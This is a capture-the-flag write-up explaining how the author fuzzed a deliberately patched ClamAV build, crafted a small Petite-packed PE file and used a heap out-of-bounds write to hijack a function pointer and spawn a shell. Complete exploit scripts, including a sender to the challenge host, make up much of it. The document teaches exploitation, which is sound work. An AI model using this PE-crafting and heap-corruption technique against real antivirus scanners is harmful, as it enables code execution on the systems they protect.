Writing Anti-Anti-Virus Exploit (AuViel

I played Hayyim CTF 2022 with keymoon, st98, and theoremoon. We solved all pwn tasks there and stood the 3rd place. *1

There was a pwn challenge to exploit an anti-virus software, which looked interesting. So, I started on solving it after wiping out all the other challenges.

Fuzz ClamAV to spot the bug
Make a small Petite PE
Achieve arb-size heap oob write primitive
Overwrite a function pointer used by ClamAV

Introduction
TL;DR
Challenge
Fuzzing ClamAV
Making PE
- smal pe
Making Petite
Writing Exploit

f:id:ptr-yudai:20220213094110p:plain

We're given a set of binary and libraries, and a patch for it. The binary is ClamAV, an open source antivirus software. The patch introduces a function named gift which calls system function with a meaingless command. The main part of the patch is the following:

diff -ru clamav/libclamav/petite.c clamav-ctf/libclamav/petite.c
--- clamav/libclamav/petite.c   2022-01-11 09:35:04.000000000 +0900
+++ clamav-ctf/libclamav/petite.c   2022-01-25 17:33:58.605682430 +0900
@@ -328,8 +328,8 @@
              */
 
             for (q = 0; q < sectcount; q++) {
-                if (!CLI_ISCONTAINED(sections[q].rva, sections[q].vsz, usects[j].rva, usects[j].vsz))
-                    continue;
+                /*if (!CLI_ISCONTAINED(sections[q].rva, sections[q].vsz, usects[j].rva, usects[j].vsz))
+                    continue;*/
                 if (!check4resources) {
                     usects[j].rva = sections[q].rva;
                     usects[j].rsz = thisrva - sections[q].rva + size;
@@ -365,10 +365,10 @@
              * func to get called instead... ehehe very smart ;)
              */
 
-            if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
+            /*if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
                 free(usects);
                 return 1;
-            }
+            }*/
 
             size--;
             *ddst++   = *ssrc++; /* eheh u C gurus gotta luv these monsters :P */
@@ -383,10 +383,10 @@
                     return 1;
                 }
                 if (!oob) {
-                    if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
+                    /*if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
                         free(usects);
                         return 1;
-                    }
+                    }*/
                     *ddst++ = (char)((*ssrc++) ^ (size & 0xff));
                     size--;
                 } else {

It looks like removing some checks in a file named petite.c.

One more happy thing is the target binary clamscan is PIE-disabled.

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'/home/auviel/clamav-0.104.2/build/libclamav:/home/auviel/clamav-0.104.2/build/libclammspack:'
    FORTIFY:  Enabled

Let's keep in mind that we can call the system function from PLT.

Since it was late of the CTF when I started solving this challenge, I wanted to know if it's solvable within hours before actually writing the exploit. So, I used a fuzzer to check if the bug could be easily caused.

Instrumenting PUT

The first thing to do is instrumenting the antivirus. The original ClamAV doesn't seem to support CC option in Makefile and I used CMAKE_C_COMPILER and CMAKE_CXX_COMPILER on cmake.

build$ cmake .. -D CMAKE_C_COMPILER=afl-gcc -D CMAKE_CXX_COMPILER=afl-g++
build$ make -j8

and it successfully compiled.

Preparing Seed

With great seeds comes great fuzzing.

It's meaningless to use a random file as the seed because it doesn't likely reach the patched code. We need to prepare a file that likely cause the bug. The patched file is named petite.c so I googled what "petite" is. It seems Petite is a packer for 32-bit Windows executables. Keymoon found the packer itself was also packed by Petite and I decided to use petite.exe as the seed file.

Running Fuzzer

I tried fuzzuf for fuzzing the target because I had already built it on my environment but AFL should also work, ofcourse.

There was a big problem on fuzzing ClamAV. clamscan needs to load the antivirus database everytime it runs. It takes about 10 seconds, which makes the fuzzing very laggy. I found I could pass --database option to specify the path to the database and it worked relatively fast when I only put bytecode.cvd and freshclam.dat in the database directory. (Please teach me if you know a better way to fuzz slow-responsive executables in AFL.)

Also don't forget to set memory limit because ClamAV consumes large memory.

fuzzuf afl -i input -o output --exec_memlimit 128 -- ./clamav/build/clamscan/clamscan --database=./db @@

After running the fuzzer for 3 or 4 minites, it found some crashes. Yay!

f:id:ptr-yudai:20220213101922p:plain

Triaging

We need to check if the crash is actually exploitable. Some bugs such as assertion error or NULL pointer dereference are "crash" but they are usually not exploitable.

Let's check the crash files.

$ ./clamav/build/clamscan/clamscan --database=./db ./output/crashes/id\:000000*
Loading:     0s, ETA:   0s [========================>]       92/92 sigs       
Compiling:   0s, ETA:   0s [========================>]       40/40 tasks 

Segmentation fault

The result of dmesg shows it's not a trivial (not a definitely-unexploitable) bug.

[65033.884299] clamscan[267713]: segfault at 5555868bd760 ip 00007ffff7b2c260 sp 00007fffffff9a10 error 4 in libclamav.so.9.1.0[7ffff7764000+741000]
[65033.884308] Code: 4c 24 08 48 89 44 24 10 48 c7 c1 bf 98 00 00 e8 be 7b 00 00 48 8b 44 24 10 48 8b 4c 24 08 48 8b 14 24 48 8d a4 24 98 00 00 00 <41> 0f b6 16 45 8d 4c 24 ff 4c 8d 40 01 49 83 c6 01 41 81 fc ff ff

Let's debug it on gdb to confirm the exploitability.

$ gdb --args ./clamav/build/clamscan/clamscan --database=./db ./output/crashes/id\:000000*
pwndbg> run

f:id:ptr-yudai:20220213102806p:plain

f:id:ptr-yudai:20220213102829p:plain

The first thing we notice is that it crashed in petite_inflate2x_1to9 function, which is exactly the patched function in this challenge. It means we found a bug in Petite analyzer at least.

The second thing to check is the exploitability. The program died at a movzx instruction as it tried to access an unmapped memory region: 0x5555868bd760. This code exists at L374 in libclamav/petite.c, which is right after the patched code.

            




            size--;
            *ddst++   = *ssrc++; 
            backbytes = 0;
            oldback   = 0;

It seems we found the intended bug. Still, we need to check how ddst and ssrc are calculated in the program above to see if this bug is likely exploitable.

The invalid pointer r14 is calculated at the following code:

f:id:ptr-yudai:20220213103539p:plain

f:id:ptr-yudai:20220213103644p:plain

r14 is 0x31303330 and this is a value taken from a part of the PE.

$ hexdump -C output/crashes/id\:000000* | grep "30 33 30 31"
00006bb0  3c 06 03 55 1d 1f 04 35  30 33 30 31 a0 2f a0 2d  |<..U...50301./.-|

The offset used to calculate ddst is also taken from the PE, meaning we have the following primitive.

some_heap_ptr[dst_offset] = some_heap_ptr[src_offset]

This concludes the bug is likely exploitable. (To be more precise, we also need to check how many times the bug can be called. I'll resolve this later.)

Reading the challenge code, it turned out I could not simply use the crash file for writing the exploit because of the following check in wrapper.py:

    if file_size > 10000 or file_size <= 0:
        print("invalid input\n")
        exit()

We need to make the exploit very small.

smal pe

Fortunately I had written a template script to generate a small PE when I solved a challenge from Pwn2Win CTF 2021 and I used the script.

To reach the Petite parser, however, it was necessary to fix some broken values in the PE because ClamAV doesn't try to inflate a broken PE. With --debug option prints some detailed messages about the error while parsing PE. I combined it with the traditional print-debug to fix my PE.

Here is the code to generate a valid small PE with 2 sections.

from ptrlib import *

num_sections = 2

pe  = b''

pe += b'MZ\0\0'
pe += b'\0' * 0x38
pe += p32(0x40) 

pe += b'PE\0\0'
pe += p16(0) 
pe += p16(num_sections) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) 
pe += p16(0xe0) 
pe += p16(2) 

pe += p16(0x010b) 
pe += p16(0) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0x5100) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0xcafe0000) 
pe += p32(0x1000) 
pe += p32(0x200) 
pe += p16(0) * 6 
pe += p32(0) 
pe += p32(0x1000) 
pe += p32(0) 
pe += p32(0) 
pe += p16(3) 
pe += p16(0) 
pe += p32(1) 
pe += p32(2) 
pe += p32(3) 
pe += p32(4) 
pe += p32(0) 
pe += p32(0x10) 
pe += p32(0x400) 
pe += p32(0x100) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) * 28

pe += b'.AAAA\0\0\0'
pe += p32(0x1000) 
pe += p32(0x4000) 
pe += p32(0x10)   
pe += p32(0x400)  
pe += p32(0) 
pe += p32(0) 
pe += p16(0) * 2
pe += p32(0) 

pe += b'.BBBB\0\0\0'
pe += p32(0x1000) 
pe += p32(0x5000) 
pe += p32(0x20)   
pe += p32(0x500)  
pe += p32(0) 
pe += p32(0) 
pe += p16(0) * 2
pe += p32(0) 
pe += b'\x00' * (0x400 - len(pe))

pe += b'A' * (0x500 - len(pe))

pe += b'A' * (0x600 - len(pe))


with open("sample.exe", "wb") as f:
    f.write(pe)

The next thing to do is make ClamAV recognize our PE as Petite-packed. Keymoon helped me to figure our how ClamAV determines the packer.

ClamAV checks packer in cli_scanpe and from L4000 exists the code to check Petite packer.

github.com

The code is small. It seems checking a mov instruction and it's immediate operand at the entry point, which is probably used by the packer for jumping to a specific position of unpacker.

    if (epbuff[0] != '\xb8' || (uint32_t)cli_readint32(epbuff + 1) != peinfo->sections[peinfo->nsections - 1].rva + EC32(peinfo->pe_opt.opt32.ImageBase)) {
        if (peinfo->nsections < 2 || epbuff[0] != '\xb8' || (uint32_t)cli_readint32(epbuff + 1) != peinfo->sections[peinfo->nsections - 2].rva + EC32(peinfo->pe_opt.opt32.ImageBase))
            found = 0;
        else
            found = 1;
    }

There are also other checks but they're just some sanity checks and we can pass them without any modifications. Finally petite_inflate2x_1to9 is called.

github.com

However, there are one more check to be passed. There is a variable named srva and we need to make it a non-zero and positive value.

    if (version == 2)
        packed = adjbuf + sections[sectcount - 1].rva + 0x1b8;
...
        srva = cli_readint32(packed);
...
        size = srva & 0x7fffffff;
        if (srva != size) { 
...

As you can see from the code above, this 32-bit value is taken from offset 0x1b8 of the last section of PE. This is the very value that caused the crash. After srva must have 2 values: size and thisrva.

            size    = cli_readint32(packed + 4); 
            thisrva = cli_readint32(packed + 8);

Now we can write the vulnerability as

adjbuf[thisrva] = adjbuf[srva]

The pointer adjbuf is defined at the beginning of the function:

    char *adjbuf     = buf - minrva;

This code looks weird because it's subtracting a value from a base pointer. buf is a buffer having the content of the sections of PE. minrva is the minimal RVA of all the sections.

f:id:ptr-yudai:20220213114303p:plain

As shown in the figure above, the pointer adjbuf is invalid itself. It it used with RVA as index so that it can directly access to the sections without converting RVA. What a scary code.

Time to write exploit :)

Making Primitive

So, adjbuf points to the invalid heap region above the actual sections. This means we can overwrite data out-of-bounds not only to the positive direction but also at the negative (small though) offset too.

Anyway, there is still one important thing we need to test: How many bytes can we overwrite?

This is a part of the code around the vulnerability:

...
            size--;
            *ddst++   = *ssrc++; 
            backbytes = 0;
            oldback   = 0;

            
            while (size > 0) {
                oob = doubledl(&ssrc, &mydl, buf, bufsz);
                if (oob == -1) {
                    free(usects);
                    return 1;
                }
                if (!oob) {
                    



                    *ddst++ = (char)((*ssrc++) ^ (size & 0xff));
                    size--;
                } else {
...

As I explained, we have already confirmed the first *ddst++ = *ssrc++; can read/write out-of-bounds. However, this is just 1-byte write and we need more.

After the first write, there is a while-loop that looks like iterating size times. We want to call this code in the while-loop to achieve OOB write with arbitrary size.

*ddst++ = (char)((*ssrc++) ^ (size & 0xff));

For this we have to pass the check:

                oob = doubledl(&ssrc, &mydl, buf, bufsz);
                if (oob == -1) {
                    free(usects);
                    return 1;
                }
                if (!oob) {
...

The question is what is doubledl?

This function is defined at the beginning of petite.c as shown below:

static int doubledl(char **scur, uint8_t *mydlptr, char *buffer, uint32_t buffersize)
{
    unsigned char mydl  = *mydlptr;
    unsigned char olddl = mydl;

    mydl *= 2;
    if (!(olddl & 0x7f)) {
        if (*scur < buffer || *scur >= buffer + buffersize - 1)
            return -1;
        olddl = **scur;
        mydl  = olddl * 2 + 1;
        *scur = *scur + 1;
    }
    *mydlptr = mydl;
    return (olddl >> 7) & 1;
}

I don't understand what this function is but there is two clear thing.

It should not return -1
We don't want it to return 0

The code below checks if ssrc is within the section being parsed.

if (*scur < buffer || *scur >= buffer + buffersize - 1)
    return -1;

It means we cannot read data out-of-bounds. This is not desperate because we still have oob write.

Dynamically debugging the function, I confirmed oob is not likely be 0. So, we can reach the following code:

*ddst++ = (char)((*ssrc++) ^ (size & 0xff));
size--;

Since the packer uses a sort of obfuscation, I wrote encoder for it.

def encode(data, size):
    output = b''
    i = 0
    for c in data:
        if i == 0:
            output += bytes([ c ])
        else:
            output += bytes([ c ^ (size & 0xff) ])
        if i % 8 == 0:
            output += bytes([0])
        i += 1
        size -= 1
    return output

Now we can write as many data as we want unless the size limit allows.

Where to Write

The last thing we need to do is finding a good target to overwrite.

First, the following data attracted my attention:

pwndbg> x/32xg 0x10647f0 - 0x1010 - 0x100
0x10636e0:      0x0000400000000000      0x0000040000001000
0x10636f0:      0x0000500000000100      0x0000060000001000
0x1063700:      0x0000000000000400      0x0000100000005000
0x1063710:      0x0000040000000600      0x0000000000000061
0x1063720:      0x000000000067ed80      0x000000000067e8a0
0x1063730:      0x0000000000000000      0x0000000000000000
0x1063740:      0x0000000000000000      0x0000000000000000
0x1063750:      0x0000000000000000      0x0000000000000000
0x1063760:      0x0000000000000000      0x0000000000000000
0x1063770:      0x0000000000000060      0x0000000000000070
0x1063780:      0x00000000004cb250      0x0000000000424010
0x1063790:      0x0000000000000000      0x0000000000000000
0x10637a0:      0x0000000000000000      0x0000000000000000
0x10637b0:      0x0000000000000000      0x0000000000000000
0x10637c0:      0x0000000000000000      0x0000000000000000
0x10637d0:      0x0000000000000000      0x0000000000000000

The chunk at 0x1063780 is obviously linked to tcache. I thought of overwriting the link with some GOT address and overwrite GOT. *2

However, when I check it on my host machine and docker, the heap layout changed drastically. It also changes as the virus database changes. So, the exploit will be super unstable even if it's possible.

After checking heap more, I found the following data when I give 2 identical PE files to CalmAV:

pwndbg> x/32xg 0x1063630 - 0x4000
0x105f630:      0x00000000000003fe      0x0000000000000000
0x105f640:      0x0000000000000000      0x07560707005d0000
0x105f650:      0x0000000000480079      0x0000000000000071
0x105f660:      0x00007ffff7dee8f0      0x00007ffff7dee900
0x105f670:      0x0000000000000000      0x0000000000000000
0x105f680:      0x0000000000000000      0x0000000000000000
0x105f690:      0x0000000000000000      0x0000000000000000
0x105f6a0:      0x0000000000000000      0xffffffffffffffff
0x105f6b0:      0x000186a001312d00      0x00000000000007d0
0x105f6c0:      0x0000000001084730      0x0000000000000131
0x105f6d0:      0x00007ffff7dee8f0      0x00007ffff7dee900
0x105f6e0:      0x0000000000000000      0x00007ffff76fbbc0
0x105f6f0:      0x0000000000000000      0x0000000000000000
0x105f700:      0x0000000000000000      0x0000000000000000
0x105f710:      0x0000000000000000      0x0000000000000122
0x105f720:      0x0000042850435245      0x0000000000000428

The pointer such as 0x00007ffff7dee8f0 or 0x00007ffff7dee900 points to machine code region. It means they are function pointers.

I don't know what function they are and who uses it when, but the chunks are not freed as you can see, which means it's likely to be called. I wrote an exploit to overwrite them with 0xffffffffdeadbeef and 0xffffffffcafebabe and run the exploit.

*RAX  0x0
*RBX  0x7fffab372bf8 ◂— 0x0
*RCX  0x7
*RDX  0x7ffff7d5cbe0 —▸ 0x10e9010 ◂— 0x20 /* ' ' */
*RDI  0x105f660 ◂— 0xffffffffdeadbeef
*RSI  0x0
*R8   0x7
*R9   0x7fffffffc3e0 ◂— 0x0
*R10  0xfffffffffffff103
*R11  0x7ffff76865e0 ◂— endbr64 
*R12  0x7fffab372bd8 ◂— 0x0
*R13  0x73
*R14  0x194
*R15  0x72
*RBP  0xa
*RSP  0x7fffffffc8c8 —▸ 0x7ffff7def2ea ◂— mov    qword ptr [rbx + 8], 0
*RIP  0xffffffffcafebabe

Yay!

As you can see, the second function pointer is called with the struct as the first argument. Therefore, we can call system("/bin/sh\0");

Final Exploit

The offset to the function pointer is still different by the environment, database, and so on. However, it seems to exist around there at least.

I changed to offset 0x10-byte each time and my exploit worked at 0x90 on remote.

from ptrlib import *

elf = ELF("share/clamscan")

num_sections = 2

pe  = b''

pe += b'MZ\0\0'
pe += b'\0' * 0x38
pe += p32(0x40) 

pe += b'PE\0\0'
pe += p16(0) 
pe += p16(num_sections) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) 
pe += p16(0xe0) 
pe += p16(2) 

pe += p16(0x010b) 
pe += p16(0) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0x5000) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0xcafe0000) 
pe += p32(0x1000) 
pe += p32(0x200) 
pe += p16(0) * 6 
pe += p32(0) 
pe += p32(0x1000) 
pe += p32(0) 
pe += p32(0) 
pe += p16(3) 
pe += p16(0) 
pe += p32(1) 
pe += p32(2) 
pe += p32(3) 
pe += p32(4) 
pe += p32(0) 
pe += p32(0x10) 
pe += p32(0x400) 
pe += p32(0x100) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) * 28

pe += b'.AAAA\0\0\0'
pe += p32(0x1000) 
pe += p32(0x4000) 
pe += p32(0x100)  
pe += p32(0x400)  
pe += p32(0) 
pe += p32(0) 
pe += p16(0) * 2
pe += p32(0) 

pe += b'.BBBB\0\0\0'
pe += p32(0x1000) 
pe += p32(0x5000) 
pe += p32(0x5000) 
pe += p32(0x600)  
pe += p32(0) 
pe += p32(0) 
pe += p16(0) * 2
pe += p32(0) 
pe += b'\x00' * (0x400 - len(pe))

pe += b'C' * (0x600 - len(pe))

pe += b'\xb8'
pe += p32(0xcafe5000)
pe += b'A' * (0x1b8 - 5)

size = 0x40

pe += p32(0x5300) 
pe += p32(size) 
pe += p32(0x90) 
pe += p32(0xdeadbeef)
pe += p32(0)
pe += p32(0)
pe += p32(0)
pe += b'B' * (0x900 - len(pe))


def encode(data, size):
    output = b''
    i = 0
    for c in data:
        if i == 0:
            output += bytes([ c ])
        else:
            output += bytes([ c ^ (size & 0xff) ])
        if i % 8 == 0:
            output += bytes([0])
        i += 1
        size -= 1
    return output

data  = b'/bin/sh\0'
data += p64(elf.plt("system"))
data *= (size // 0x10)
pe += encode(data, size)
pe += b'B' * (0x2000 - len(pe))

print(len(pe))
with open("sample.exe", "wb") as f:
    f.write(pe)

from ptrlib import *

fs = [
    "sample.exe",
    "sample.exe",
]


sock = Socket("nc 141.164.48.191 10000")

sock.sendlineafter(": ", str(len(fs)))
for f in fs:
    buf = open(f, "rb").read()
    assert len(buf) < 10000
    sock.sendlineafter(": ", str(len(buf)))
    sock.sendafter(": ", buf)

sock.interactive()

This challenge ended with 1 solve.